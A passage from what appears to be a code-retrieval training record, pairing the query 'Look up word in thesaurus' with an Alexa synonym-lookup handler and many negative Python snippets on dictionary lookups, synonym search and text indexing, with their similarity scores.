'two', 'fish']\n\n # Cap with letter and add period at the end.\n final_sentece = \" \".join(sentence) + \".\"\n return final_sentece.capitalize()", "def speak(self, what):\n if isinstance(what, str):\n return self.whatever()\n\n what = self.clean(what)\n if not what or what == '':\n return self.silence()\n if what.isupper():\n return self.shouting()\n if what.endswith('?'):\n return self.asking()\n return self.whatever()", "def predict_sentences(self, sents):\n tkw=self.tkw\n sents_attr=[]\n sent_samples={\n \"word_inputs\":[],\n \"predicate_inputs\":[],\n \"postags_inputs\":[]\n }\n print('prepare data')\n for sid,sent in enumerate(sents):\n if sid % (int(np.ceil(len(sents)/100))) == 0:\n print(sid / len(sents))\n sent_str = \" \".join(sent)\n preds = [(word.i, str(word))\n for word\n in tkw.parser(sent_str)\n if word.tag_.startswith(\"V\")]\n num_of_samples = int(np.ceil(float(len(sent)) / self.sent_maxlen) * self.sent_maxlen)\n pred_list=[]\n for ind, pred in preds:\n cur_sample=self.encode_inputs([self.create_sample(sent, ind)])\n for name in [\"word_inputs\", \"predicate_inputs\", \"postags_inputs\"]:\n sent_samples[name].append(cur_sample[name])\n pred_list.append((ind, pred))\n sents_attr.append((num_of_samples,pred_list,len(sent)))\n for key in sent_samples:\n sent_samples[key]=np.concatenate(sent_samples[key],axis=0)\n print('predict data')\n X = sent_samples\n Y=self.model.predict(X)\n # print(Y[0])\n # print(Y[2])\n res=[]\n p=0\n for attr in sents_attr:\n num_of_samples,pred_list,sent_len=attr\n sample_len=num_of_samples//self.sent_maxlen\n ret=[]\n for pid,(ind, pred) in enumerate(pred_list):\n ret.append(((ind, pred),\n [(self.consolidate_label(label), float(prob))\n for (label, prob) in\n self.transform_output_probs(Y[p+pid*sample_len:p+(pid+1)*sample_len], \n get_prob = True).reshape(num_of_samples,\n 2)[:sent_len]]))\n res.append(ret)\n p+=len(pred_list)*sample_len\n return res" ]
[ "0.67601943", "0.6399362", "0.6366831", "0.63550425", "0.6288494", "0.62700784", "0.6220967", "0.6183083", "0.6126741", "0.6104425", "0.60613656", "0.60591984", "0.6058863", "0.59571433", "0.5951869", "0.59310657", "0.5929599", "0.5913799", "0.5897607", "0.589439", "0.58943844", "0.5884642", "0.5851857", "0.58299387", "0.5825041", "0.58182675", "0.58036625", "0.57902575", "0.578956", "0.5780092", "0.5771403", "0.57526654", "0.57390195", "0.57295763", "0.5728217", "0.5725698", "0.57237893", "0.57094765", "0.5693179", "0.5684071", "0.5673015", "0.56726843", "0.56724805", "0.56607", "0.563757", "0.5607794", "0.5592702", "0.55901426", "0.5574678", "0.5572765", "0.5564563", "0.5547697", "0.553798", "0.5533821", "0.55324495", "0.5519464", "0.55131036", "0.55102533", "0.5509883", "0.55077225", "0.5502964", "0.54963785", "0.54855907", "0.5484039", "0.54801685", "0.547996", "0.547581", "0.5470834", "0.5470009", "0.5469212", "0.54614276", "0.5452656", "0.5452409", "0.54512376", "0.54496765", "0.5446275", "0.54451936", "0.54416627", "0.54387164", "0.54315436", "0.5430249", "0.5427507", "0.5426966", "0.5426966", "0.5415549", "0.54114366", "0.5409098", "0.54078203", "0.5401266", "0.54002124", "0.5399653", "0.53985447", "0.53969854", "0.5396285", "0.53939956", "0.5393861", "0.53921163", "0.53832746", "0.53776896", "0.53776515" ]
0.653233
1
Look up word in thesaurus
def my_word_example_handler(handler_input): # type: (HandlerInput) -> Response slots = handler_input.request_envelope.request.intent.slots if synonym_slot in slots: curr_word = slots[synonym_slot].value handler_input.attributes_manager.session_attributes[ synonym_slot_key] = curr_word try: synonyms = http_get(curr_word, True) if type(synonyms[0]) == dict: speech = ("A synonym for {} is {}".format(curr_word, synonyms[0]['meta']['syns'][0][0])) synonym_list = synonyms[0]['meta']['syns'][0] reprompt = ("What word would you like a synonym for?") else: speech = ("No synonyms for {} are available. " "Can I look up another word?").format(curr_word) reprompt = ("What word would you like a synonym for?") except: speech = ("No synonyms for {} are available. " "Can I look up another word?").format(curr_word) reprompt = ("What word would you like a synonym for?") else: speech = "I'm not sure what word to find a synonym for, please try again" reprompt = ("I didn't catch that. What word would you like me " "me to look up a synonym for?") handler_input.attributes_manager.session_attributes[previous_key] = speech handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lookup(self, word):\n word = word.lower()\n if self.stemmer:\n word = self.stemmer.stem(word)\n \n return [self.documents.get(id, None) for id in self.index.get(word)]", "def thesaurus(self, message):\n read_pointer = open('Thesaurus.txt')\n\n for line in read_pointer:\n split_line = line.split(':', 1)\n if split_line[0] == message:\n return split_line[1]", "def search(self, word):", "def query_word(self, word):\n raise NotImplementedError", "def lookup(text):\n ret = basic(text)\n ret.update(basic(text, \"gwas\"))\n return ret", "def lookup_word(word):\n\n return API.get_response(word)", "def query_word(self, word):\n return [r[0] for r in sparqlquery(self.endpoint, self.query % {'word': word})]", "def find_abecedarian_words():\n pass", "def search(self, term):", "def search(self, lookupword):\n with sqlite3.connect(self.dbpath) as conn:\n cursor = conn.cursor()\n cursor.execute('SELECT word, videofile FROM translation WHERE \\\n lower(word)=lower(?)', (lookupword,))\n find = cursor.fetchall()\n\n if find != []:\n # the word was found\n find = self.addSuffixes(find)\n return (True, find)\n\n else:\n # the word was not found\n # search the database for similar words\n altoptions = self._findAltOpts(lookupword)\n return (False, altoptions)", "def test_issue7306(en_lookup_nlp):\n doc = Doc(en_lookup_nlp.vocab, words=[\"singing\"])\n lemmatizer = en_lookup_nlp.get_pipe(\"lemmatizer\")\n doc = lemmatizer(doc)\n assert doc[0].lemma_ == \"sing\"", "def scrapeSynonym(word,key='b08CVJHscZ6rRGfc7MzS',language='en_US', max=5):\n endpoint = \"http://thesaurus.altervista.org/thesaurus/v1\"\n url = endpoint + \"?word={}&language={}&key={}&output=json\".format(word,language,key)\n r = requests.request('GET', url, timeout=5.0)\n if r.status_code == 200:\n try:\n syns = r.json()['response'][0]['list']['synonyms'].split('|')\n except KeyError or TypeError:\n return None\n\n del syns[max:]\n for i in range(len(syns)):\n syns[i] = syns[i].split(' ')[0] \n\n return {'word' : word,'syns' : syns}", "def _lookup(self, search, auto_suggest=True):\n try:\n # Use the version of Wikipedia appropriate to the request language\n dict = self.translate_namedvalues(\"wikipedia_lang\")\n wiki.set_lang(dict[\"code\"])\n\n # First step is to get wiki article titles. This comes back\n # as a list. I.e. \"beans\" returns ['beans',\n # 'Beans, Beans the Music Fruit', 'Phaseolus vulgaris',\n # 'Baked beans', 'Navy beans']\n results = wiki.search(search, 5)\n if len(results) == 0:\n self.speak_dialog(\"no entry found\")\n return\n\n # Now request the summary for the first (best) match. Wikipedia\n # writes in inverted-pyramid style, so the first sentence is the\n # most important, the second less important, etc. Two sentences\n # is all we ever need.\n lines = 2\n summary = wiki.summary(results[0], lines,\n auto_suggest=auto_suggest)\n\n if \"==\" in summary or len(summary) > 250:\n # We hit the end of the article summary or hit a really long\n # one. Reduce to first line.\n lines = 1\n summary = wiki.summary(results[0], lines,\n auto_suggest=auto_suggest)\n\n # Now clean up the text and for speaking. Remove words between\n # parenthesis and brackets. Wikipedia often includes birthdates\n # in the article title, which breaks up the text badly.\n summary = re.sub(r'\\([^)]*\\)|/[^/]*/', '', summary)\n\n # Send to generate displays\n self.gui.clear()\n pagetext = wiki.page(results[0], auto_suggest=auto_suggest)\n self.gui['summary'] = summary\n self.gui['imgLink'] = wiki_image(pagetext)\n self.gui.show_page(\"WikipediaDelegate.qml\", override_idle=60)\n\n # Remember context and speak results\n self.set_context(\"wiki_article\", results[0])\n self.set_context(\"spoken_lines\", str(lines))\n self.speak(summary)\n self.results = results\n\n except wiki.exceptions.DisambiguationError as e:\n # Test: \"tell me about john\"\n options = e.options[:5]\n\n option_list = (\", \".join(options[:-1]) + \" \" +\n self.translate(\"or\") + \" \" + options[-1])\n choice = self.get_response('disambiguate',\n data={\"options\": option_list})\n if choice:\n self._lookup(choice, auto_suggest=auto_suggest)", "def filter(self, word):\n \n word = word.lower()\n try:\n self.engine.fetch(word)\n except socket.error:\n raise LemmaAPIError\n part_of_speeches = self.engine.part_of_speeches\n\n \n self.basic_form = word\n for part in part_of_speeches:\n if part == 'verb':\n if self.engine.is_verb_conjugated():\n if not self.conEngine.is_verb_regular(word, self.engine.get_basic_verb()):\n self.basic_form = self.engine.get_basic_verb()\n return word\n else:\n self.basic_form = self.engine.get_basic_verb()\n\n elif part == 'noun':\n if self.engine.is_noun_plural():\n if not self.conEngine.is_noun_regular(word, self.engine.get_singular_noun()):\n self.basic_form = self.engine.get_singular_noun() \n return word\n else:\n self.basic_form = self.engine.get_singular_noun()\n\n return self.basic_form", "def lookup(index,keyword):\n\tif keyword in index:\n\t\treturn index[keyword]\n\treturn None", "def get_word( self, result ):\n text = result.text if is_result( result ) else result\n # print(\"get_word: %s\" % text)\n # Get if already exists\n word = self.session.query( Word ).filter( Word.word == text ).first()\n\n # Create a new word if doesn't yet exist\n if not isinstance( word, Word ):\n word = Word()\n word.word = text\n\n return word", "def test_find_word(self):\n mic = mi.MicrophoneToText()\n\n teststring = 'x transcript\": ort lautet testort }x'\n\n word = mic.find_word(teststring)\n\n self.assertEqual(word, ' ort lautet testort ')", "def get_translation(self, word):\n qr = Query()\n val = self.db.search(qr.word == word)\n if val:\n return val[0][\"translations\"]\n else:\n return []", "def meaning_of(word, app_id, app_key):\n \n url = 'https://od-api.oxforddictionaries.com:443/api/v1/entries/' + language + '/' + word.lower()\n r = requests.get(url, headers={\"app_id\":app_id, \"app_key\":app_key})\n\n data = r.json()\n useful_data = {}\n\n for i in data['results'][0]['lexicalEntries'][0]['entries']:\n for j in i:\n for k in i[j][0]:\n try:\n subdata = i[j][0][k]\n if k == 'subsenses':\n useful_data.update({\"meanings\":subdata[0]['definitions']})\n elif k == 'examples':\n useful_data.update({\"examples\":subdata[0]['text']})\n else:\n pass\n except:\n pass\n return useful_data", "def lesk(self, tweet, word, created_at, tweet_id):\n ikb_obj = self.database.get(self.collection_of_slangs, field='word', value=word)[0]\n ikb_id = ikb_obj[\"_id\"]\n\n dicts = ikb_obj['payload']\n elements = [value for dictt, item in dicts.items() for value in item]\n definitions, usages = self.extract_def_use(elements)\n if len(definitions) == 0:\n raise ValueError(\"Empty lists of definitions and usages\")\n usages_vec = self.model.vectorize_sentences(usages)\n tweet_vec = self.model.vectorize_sentences([tweet])\n cs = np.array(cosine_similarity(usages_vec, tweet_vec))\n ind_max = np.argmax(cs)\n\n best_definition = definitions[ind_max]\n dictionary_of_best_definition = EnrichmentLayer.find_name_of_dict_by_definition(dicts, best_definition)\n try:\n filter_for_search = {\"dictionary_title\": dictionary_of_best_definition, \"definition\": best_definition}\n document = self.database.get(self.collection_used_slang, filter=filter_for_search)[0]\n tweets = document['tweets']\n tweets.append(tweet_id)\n self.database.update(self.collection_used_slang, \"ikb_id\", ikb_id, {\"tweets\": tweets}, upsert=False)\n id_of_insert = document['_id']\n except IndexError:\n document = {'ikb_id': ikb_id, 'word': word, 'dictionary_title': dictionary_of_best_definition,\n 'definition': best_definition, 'created_at': created_at, 'tweets': [tweet_id]}\n id_of_insert = self.database.insert(self.collection_used_slang, document)\n\n return self.replace_word(tweet.split(), word, best_definition), best_definition, id_of_insert", "def definition(request, word_to_lookup):\n return render(request, 'definition.html')", "def phrase_retrieve(self, query):\n # ------------------------------------------------------------------\n # TODO: Implement Phrase Query retrieval (ie. return the documents \n # that don't just contain the words, but contain them in the \n # correct order) You will want to use the inverted index \n # that you created in index(), and may also consider using\n # boolean_retrieve. \n # NOTE that you no longer have access to the original documents\n # in self.docs because it is now a map from doc IDs to set\n # of unique words in the original document.\n # Right now this just returns all possible documents!\n docs = []\n first_hash = self.boolean_retrieve(query) # narrows down possible documents\n\n for doc in first_hash:\n title = self.titles[doc]\n word_list = []\n \n for word in query:\n word_list.append(self.inv_index[word][title]) # list for each query word from inverted index\n\n if len(word_list) == 1:\n docs.append(doc) # only one word in query\n break\n\n is_match = bool # undefined boolean value for match or not\n\n for i in word_list[0]: # first word occurrence positions\n for j in range(1, len(query)): # next words in query\n if (i + j) in word_list[j]: # check if words in positional order for document\n is_match = True # stays true throughout range(1, len(query)) if match\n else:\n is_match = False # update match status \n break\n if is_match:\n docs.append(doc)\n break\n \n # ------------------------------------------------------------------\n return sorted(docs) # sorted doesn't actually matter", "def test_word_found_in_file(self):\n\n # create indexer object\n indexer = indexing_module.IndexModule()\n\n # index the location (storage/data/test/empty_directory)\n indexer.index(_path_prefix + 'word_not_found')\n\n # search for few words and check that the result is empty\n result = indexer.search(\"unit\")\n self.assertTrue(result != [])\n\n result = indexer.search(\"index\")\n self.assertTrue(result != [])\n print(result)", "def search(self, query, k=None):\n # all_dicts = self._indexer.load_index('inverted_idx.pkl')\n inverted_index = self._indexer.inverted_idx\n posting = self._indexer.postingDict\n documents = self._indexer.documents\n dict_of_methods = self._indexer.dict_of_method\n\n if dict_of_methods['wordnet']== True:\n #wordnet method\n doc_query_app = self.finished_dict(query, inverted_index) # first parse query words\n list_of_query = doc_query_app.keys()\n words_to_add = {}\n # get each query word its synsets and add to query the ones that in inverted index\n for word in list_of_query:\n opt = wordnet.synsets(word)\n for i in range(len(opt)):\n check_word = opt[i].lemmas()[0].name()\n if check_word in doc_query_app.keys() or check_word in words_to_add.keys():\n continue\n tested = self._indexer.check_upper_lower(inverted_index, check_word)\n if tested[1] is False or tested[0] in doc_query_app.keys() or tested[0] in words_to_add.keys():\n continue\n if tested[1] is True:\n words_to_add[tested[0]] = 0.0001\n elif tested[1] is 'replace':\n words_to_add[tested[0].upper()] = 0.0001\n doc_query_app.update(words_to_add)\n\n elif dict_of_methods['spell_correction']== True:\n spell = SpellChecker(case_sensitive=True)\n query_as_list = query.split()\n for index in range(len(query_as_list)):\n is_upper = False\n word = query_as_list[index]\n # if word from query not in inverted index look for correction- take the first one that is in inverted index\n if self._indexer.check_upper_lower(inverted_index, word)[1] is False: # word not in inverted index\n if word[0].isupper() is True:\n is_upper = True\n options = spell.candidates(word)\n is_found = False\n i = 0\n options = list(options)\n while i < len(options):\n if self._indexer.check_upper_lower(inverted_index, options[i])[1] is True:\n corrected = options[i]\n is_found = True\n break\n i += 1\n # corrected = spell.correction(word)\n if is_found is not False and corrected != query_as_list[index]:\n if is_upper is True:\n corrected = corrected.capitalize()\n query_as_list[index] = corrected\n doc_query_app = self.finished_dict(\" \".join(query_as_list), inverted_index)\n\n elif dict_of_methods['word2vec'] == True:\n words_to_add = {}\n doc_query_app = self.finished_dict(query, inverted_index)\n query_as_list = query.split()\n insert_new_words = []\n for word in query_as_list:\n if word in self._model.wv.wv.vocab:\n lst_sim_word_model = self._model.most_similar(word.lower())\n for similiar_word in lst_sim_word_model:\n if similiar_word[1] > 0.33:\n insert_new_words.append(similiar_word[0])\n\n # if len(insert_new_words) == 0:\n # continue\n idx = 0\n while idx < len(insert_new_words):\n if insert_new_words[idx] in doc_query_app.keys() or insert_new_words[idx] in words_to_add.keys():\n idx += 1\n continue\n tested = self._indexer.check_upper_lower(inverted_index, insert_new_words[idx])\n if tested[1] is False or tested[0] in doc_query_app.keys() or tested[0] in words_to_add.keys():\n idx += 1\n continue\n if tested[1] is True:\n words_to_add[tested[0]] = 0.6\n break\n elif tested[1] is 'replace':\n words_to_add[tested[0].upper()] = 0.6\n break\n idx += 1\n doc_query_app.update(words_to_add)\n\n elif dict_of_methods['thesaurus'] == True:\n doc_query_app = self.finished_dict(query, inverted_index) # first parse query words\n list_of_query = list(doc_query_app.keys())\n words_to_add = {}\n # get each query word its synonyms and add to query the first that is in inverted index\n stop = set(stopwords.words('english'))\n results = [thes.synonyms(i, fileid=\"simN.lsp\") for i in list_of_query if i not in stop]\n results_as_list = list(results)\n for words in results_as_list:\n inside_list = list(words)\n if len(inside_list) == 0:\n continue\n idx = 0\n while idx < len(inside_list):\n if inside_list[idx] in doc_query_app.keys() or inside_list[idx] in words_to_add.keys():\n idx += 1\n continue\n tested = self._indexer.check_upper_lower(inverted_index, inside_list[idx])\n if tested[1] is False or tested[0] in doc_query_app.keys() or tested[0] in words_to_add.keys():\n idx += 1\n continue\n if tested[1] is True:\n words_to_add[tested[0]] = 0.0001\n break\n elif tested[1] is 'replace':\n words_to_add[tested[0].upper()] = 0.0001\n break\n idx += 1\n doc_query_app.update(words_to_add)\n\n else: # dict_of_methods['parser'] = True\n doc_query_app = self.finished_dict(query, inverted_index)\n\n if len(doc_query_app) == 0:\n return []\n\n dict_relevant_docs = self._relevant_docs_from_posting(doc_query_app, posting)\n ranked_doc_ids = Ranker.rank_relevant_docs(dict_relevant_docs , posting, documents, doc_query_app)\n n_relevant = len(ranked_doc_ids)\n return n_relevant, ranked_doc_ids", "def koreksi_elongasi(word, df_crc=df_crc):\n if list(df_crc['formal'][df_crc['slang']=='{}'.format(word)].values) == []:\n return word\n return df_crc['formal'][df_crc['slang']=='{}'.format(word)].values[0]", "def wiktionary(bot, trigger):\n word = trigger.group(2)\n if word is None:\n bot.reply('You must tell me what to look up!')\n return\n\n _etymology, definitions = wikt(word)\n if not definitions:\n # Cast word to lower to check in case of mismatched user input\n _etymology, definitions = wikt(word.lower())\n if not definitions:\n bot.reply(\"Couldn't get any definitions for %s.\" % word)\n return\n\n result = format(word, definitions)\n if len(result) < 300:\n result = format(word, definitions, 3)\n if len(result) < 300:\n result = format(word, definitions, 5)\n\n bot.say(result, truncation=' […]')", "def test_issue4104(en_lookup_nlp):\n words = [\"dry\", \"spun\", \"spun-dry\"]\n doc = Doc(en_lookup_nlp.vocab, words=words)\n lemmatizer = en_lookup_nlp.get_pipe(\"lemmatizer\")\n doc = lemmatizer(doc)\n assert [token.lemma_ for token in doc] == [\"dry\", \"spin\", \"spin-dry\"]", "def search_word(word : str = typer.Argument(..., help=\"Searches the trie if the word exists\")):\n response_url = url + \"/search/\" + word\n response = requests.get(response_url)\n typer.echo(response.json()[\"status\"])", "def search(self, word):\n return self.helper(word, self.root)", "def search(self, word):\n return self.helper(word, self.root)", "def lookup(self, term):\n results = []\n lookup_term = term.lower()\n for char, latex, description, user_description in self.entries:\n if (char == term or\n latex.startswith(lookup_term) or\n latex[1:].startswith(lookup_term) or\n lookup_term in description.lower() or\n (user_description and lookup_term in user_description)):\n results.append((char, latex, description, user_description))\n return results", "def search(self, word):\n return self.find(self.root,word)", "def get_definition(request):\n result = \"No result\"\n if request.method == \"GET\":\n word = request.GET.get(\"get_word\", None)\n syns = wn.synsets(word)\n if len(syns) > 0:\n result = syns[0].definition()\n else:\n result = \"no result for word:\" + word\n return render(request, \"blog/re_definition.html\", {'result': result, 'word': word})", "def search_single_word(word):\n # YOUR CODE HERE #\n pass # delete this when you write your code", "def get_embeddings_for_word(target_word, tt, token_embeddings, sentence, anaphor = False):\n if target_word not in tt:\n og_index = find_og_index(target_word, sentence)\n return get_wordpiece_embeddings(og_index, tt, token_embeddings)\n\n ## Get all indices of target word\n indices = [i for i, x in enumerate(tt) if x == target_word]\n if anaphor:\n target_index = indices[-1]\n else:\n target_index = indices[0]\n # Index of target word\n # target_index = tt.index(target_word)\n\n return token_embeddings[target_index]", "def suggest(word, cutoff=0.77):\n if word in LOOKUP_TABLE:\n return LOOKUP_TABLE[word]\n\n guess = difflib.get_close_matches(word, MOST_COMMON_DOMAINS, n=1, cutoff=cutoff)\n if guess and len(guess) > 0:\n return guess[0]\n return word", "def get_lemma(word):\n return stemmer.stem(word)", "def search_word(word,db):\n\tresults = {}\n\tfor w in word.split(' '):\n\t\ttemp = db.search(w)\n\t\tfor count,url,found_text in temp:\n\t\t\tif results.has_key(url):\n\t\t\t\tresults[url][0] += count\n\t\t\t\tif results[url][1] == \"None\":\n\t\t\t\t\tresults[url][1] = found_text\n\t\t\telse:\n\t\t\t\tresults[url] = [count,found_text]\t\n\t# sort the results according to the occurence\n\tif results:\n\t\tprint \"Results for '%s'\" % word\n\t\tfor url in sorted(results, key=results.get, reverse=True):\n\t\t\tif results[url][1] != \"None\":\n\t\t\t\tprint url, \" [ \",results[url][1], \" ] \"\n\t\t\telse:\n\t\t\t\tprint url\n\telse:\n\t\tprint \"No Results Found.\"", "def search_for_word(self, word, depth=\"shallow\"):\n\n # self._get_search_response(word)\n self._extract_html(uri_for_search(word))\n\n results = self.html.select(\".concept_light.clearfix\")\n # print(results)\n fmtd_results = []\n\n if depth == \"shallow\":\n for r in results:\n fmtd_results.append(self._extract_dictionary_information(r))\n\n elif depth == \"deep\":\n\n for r in results:\n fmtd_results.append(self._extract_dictionary_information(r))\n\n # If there are more than 20 results on the page, there is no \"More Words\" link\n more = self.html.select_one(\".more\")\n\n while more:\n link = more.get(\"href\")\n response = requests.get(r\"http:\" + link, timeout=5)\n html = BeautifulSoup(response.content, \"html.parser\")\n results = html.select(\".concept_light.clearfix\")\n\n for r in results:\n fmtd_results.append(self._extract_dictionary_information(r))\n\n more = html.select_one(\".more\")\n\n return fmtd_results", "def get_searched_single_word_synonym(self, content, stop_words):\n content = re.sub(r\"[^\\w\\s]\", \"\", content)\n content = re.sub(r\"[0-9]+\", \"\", content)\n new_sent = [\n Word(word).singularize()\n for word in content.lower().split()\n if Word(word).singularize() not in stop_words\n ]\n new_sent = [\n Word(word).singularize()\n for word in new_sent\n if Word(word).singularize() in set(self.searched_words)\n ]\n\n syn = []\n for w in new_sent:\n for s in wordnet.synsets(w):\n for lemma in s.lemmas():\n if len(syn) == SYNONYM_LIMIT:\n break\n syn.append(lemma.name())\n syn = list(dict.fromkeys(syn)) #\n syn = \" \".join(syn)\n return syn", "def word_finder(request):\n correction = \" \"\n error = \" \"\n alist = [\"NONE\"]\n if request.method == \"GET\":\n spell_checker(request)\n\n return render(request, \"blog/word_finder.html\", {'correction' : correction, 'error': error, 'args': alist})", "def words(self, word):\n pass", "def return_wikipedia_term(res):\n rst = []\n if res['spotted']:\n for s in [s['spot'] for s in res['value']['spots']]:\n r = TagMeService.retrieve_taggings(s.encode('utf-8'), method='POST')\n if len(r['annotations']) != 0:\n for n in r['annotations']:\n if 'title' in n.keys():\n title = n['title'].replace(' ', '_') # strip whitespaces from dbpedia tag\n rst.append(title)\n else:\n print \"Cannot find title in annotations: \" + str(n)\n return rst", "def get_speech(self, word):\n posses = ['verb', 'noun', 'adj', 'adv', 'as in', 'conjunction']\n speeches = []\n\n def get_all_synonyms(word1, speech1):\n for w in Word(word1).synonyms('all', partOfSpeech=speech1):\n if not w == []:\n return w\n return []\n\n def empty_tree(input_list):\n # print(input_list)\n if type(input_list) == type([]):\n for l in input_list:\n if not empty_tree(l):\n return False\n return True\n else:\n return False\n\n for poss in posses:\n if not empty_tree(get_all_synonyms(word, poss)):\n speeches.append(poss)\n return speeches", "def getWord(self,):\n\t\treturn self.word;", "def urban_dict(word):\n\n url = \"https://mashape-community-urban-dictionary.p.rapidapi.com/define\"\n\n querystring = {}\n\n querystring[\"term\"] = word\n\n headers = config.headers\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n print(response.text)", "def get_word():\n word=words_dict[randrange(0,len(words_dict))]\n return word", "def get_word():\n word=words_dict[randrange(0,len(words_dict))]\n return word", "def get_word():\n word=words_dict[randrange(0,len(words_dict))]\n return word", "def info_content(self,lookup_word):\n\t if self.N == 0:\n\t # poor man's lazy evaluation\n\t for sent in brown.sents():\n\t for word in sent:\n\t word = word.lower()\n\t if not word in self.brown_freqs.keys():\n\t self.brown_freqs[word] = 0\n\t self.brown_freqs[word] = self.brown_freqs[word] + 1\n\t self.N = self.N + 1\n\t lookup_word = lookup_word.lower()\n\t n = 0 if not lookup_word in self.brown_freqs.keys() else self.brown_freqs[lookup_word]\n\t return 1.0 - (math.log(n + 1) / math.log(self.N + 1))", "def _index_phrase_words(self, phrase: Phrase) -> None:\n if phrase.phrase_string not in self.phrase_type:\n raise ValueError(f\"Cannot index phrase words for non-registered phrase: {phrase.phrase_string}\")\n for wi, word in enumerate(re.finditer(r\"\\w+\", phrase.phrase_string)):\n if wi == 0:\n self.first_word_in_phrase[word.group(0)][phrase.phrase_string] = word.start()\n self.word_in_phrase[word.group(0)].add(phrase.phrase_string)", "def search(self, word):\r\n return self.DFS(word, 0, 0, self.trie.root)", "def two_word_finder(word1,word2,text):\r\n word1 = word1.lower()\r\n word2 = word2.lower()\r\n text = str(text).lower()\r\n if word1 and word2 in text:\r\n return True #return text to see specific tweets\r\n return False", "def wordInfo(self, input_word):\n return self.app.get('/words/1.0/info/' + input_word, follow_redirects=True, headers=self.headers)", "def translate_leet(phrase):", "def searchphrases(query):\n query_nostopwords = removestopwords(query)\n query_lemmatized = lemmatize(query_nostopwords) #look like\n phraseids = []\n ngramids=[]\n words=query_lemmatized.split()\n query_ngram = \"select id from ngrams where lower(lemmangrams) like lower('%{}%')\".format(query_lemmatized)+\" or lower(lemmangrams) like lower('%{}%')\".format(words[0])\n for word in words[1:]:\n query_ngram=query_ngram+\" or lower(lemmangrams) like lower('%{}%')\".format(word)\n con = it.engine.execute(query_ngram)\n rows_phrase = con.fetchall()\n if rows_phrase:\n ngramids = list(set([str(i[0]) for i in rows_phrase]))\n phraseids.extend(ngramids)\n phraseids = list(set(phraseids))\n results=categorize(phraseids)\n return results", "def get_synonyms(word):\n syns_sets = wordnet.synsets(word)\n if syns_sets:\n # if there's synonyms, take the first set\n desired = syns_sets[0].lemma_names()\n desired = [the_name.replace(\"_\", \" \") for the_name in desired]\n return desired\n\n else:\n return False", "def lookup():", "def wikipedia_search(result,sentence):\r\n result = wikipedia.summary(result,sentences=sentence)\r\n return result", "def define(word):\n\treturn lexicon.get(word.upper(), \"I couldn't find the definition of {}\\n\".format(word))", "def choose_word():\n pass", "def searchGlossary(self,keyword):\n\t\twords = []\n\n\t\tfor letter in glossary:\n\t\t\tfor word in glossary[letter]:\n\t\t\t\tprint word.keys()[0]\n\t\t\t\tif keyword.lower() in word.keys()[0].lower():\n\t\t\t\t\twords.append(word)\n\n\t\treturn words", "def wiktionary_ety(bot, trigger):\n word = trigger.group(2)\n if word is None:\n bot.reply('You must give me a word!')\n return\n\n etymology, _definitions = wikt(word)\n if not etymology:\n bot.reply(\"Couldn't get the etymology for %s.\" % word)\n return\n\n result = \"{}: {}\".format(word, etymology)\n\n bot.say(result, truncation=' […]')", "def lookup(self, pos, word_pat, enable_de=True):\n from sagas.ru.ru_dictionary import RuDictionary\n print('.. load dictionary')\n dic=RuDictionary(pos=pos)\n rs=dic.lookup(word_pat, enable_de)\n print(rs)", "def get_word(naf: KafNafParser, term: Cterm) -> str:\n tokenids = naf.get_dict_tokens_for_termid(term.get_id())\n tokens = sort_tokens(naf.get_token(tid) for tid in tokenids)\n return \" \".join(t.get_text() for t in tokens)", "def query_word(self, word):\n if self.endpoint.startswith('http://'):\n # url\n return [r[0] for r in rqlquery(self.endpoint, self.query % {'word': word})]\n else:\n return [r[0] for r in rqlquery(self.endpoint, self.query, word=word)]", "def tf(word,document):\n words = document.split()\n\n return sum(1 for w in words if w == word)", "def search(self, word):\n return self.__search(self.__root, word,0)", "def lookup(*args):\n lemma, results = etym(*args)\n languages = nest()\n if not results:\n query, _, dictionary = args\n lemma, results = etym(query, None, dictionary)\n for result in results:\n languages[lemma][unicode(result['pos'])] = result['languages']\n return languages", "def lookup(doc, wv):\n checked = []\n for word in doc:\n try:\n word in wv\n except KeyError:\n log.warning(\"Word not in model: %s\", word)\n continue\n checked.append(wv[word])\n vec = np.mean(checked, axis=0)\n return vec", "def search(self, word):\n node = self.root\n return self.searchHelper(node, word)", "def _word_lookup(self, key: str) -> int:\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx", "def lookup_concept(wikidataId):\n\n if cfg.USE_CACHE:\n if (wikidataId in LOOKUP_DICT):\n return LOOKUP_DICT[wikidataId]\n \n response_json = wa.request_entity_fishing_concept_lookup(wikidataId)\n \n if not response_json:\n return nan\n\n if 'statements' not in response_json.keys():\n return nan\n\n for statement in response_json['statements']:\n if statement['propertyId'] == 'P1566':\n logger.debug('GeoNamesID found for %s: %s', wikidataId, statement['value'])\n if cfg.USE_CACHE:\n LOOKUP_DICT[wikidataId] = statement['value']\n return statement['value']\n\n \n return nan", "def synonyms_wiktionary(name, lang=\"fr\"):\n import wptools\n page = wptools.page(name, wiki='{0}.wiktionary.org'.format(\n lang), lang=lang, silent=True)\n page.get_parse()\n text = page.data['wikitext']\n syn = \"==== {{S|synonymes}} ====\"\n if syn not in text:\n return None\n text = text.split(syn)[1].split(\"====\")[0]\n reg = re.compile(\"[[]{2}(.*?)[]]{2}\")\n res = reg.findall(text)\n return res", "def find_related_concepts(text):\n #\n # Find wikipedia terms in text\n # Spot terms in text\n text = text.encode('ascii', 'replace')\n response = TagMeService.check_spotting(text)\n\n results = return_wikipedia_term(response)\n\n #\n # Lookup terms in taxonomy and fetch relatedConcepts (keywords)\n # return related terms if they are found in the taxonomy\n\n return lookup_in_taxonomy(results)", "def translate(word: str) -> str:\n global LINE_DIVIDER\n\n parser = WiktionaryParser()\n def_ = parser.fetch(word.lower())\n ret = \"\"\n for word_payload in def_:\n definitions = word_payload['definitions']\n\n translations = {d['partOfSpeech']: LINE_DIVIDER.join(d['text'])\n for d in definitions}\n ret += LINE_DIVIDER.join(f\"{k}: {v}\" for k,v in translations.items())\n\n return ret", "def get_word_for_gloss(annotation_value, mapping):\n\n # get the XML parent, called <REF_ANNOTATION>\n ref_annotation = annotation_value.getparent()\n # find the attributed called ANNOTATION_REF, which gives the ID of the referred annotation\n annotation_ref = ref_annotation.attrib[\"ANNOTATION_REF\"]\n wordtext = mapping.get(annotation_ref, \"\")\n return wordtext", "def test_contains_returns_true_when_word_in_trie(full_trie):\n assert full_trie.contains(\"hey\") is True", "def rhymeWords(self, input_word):\n return 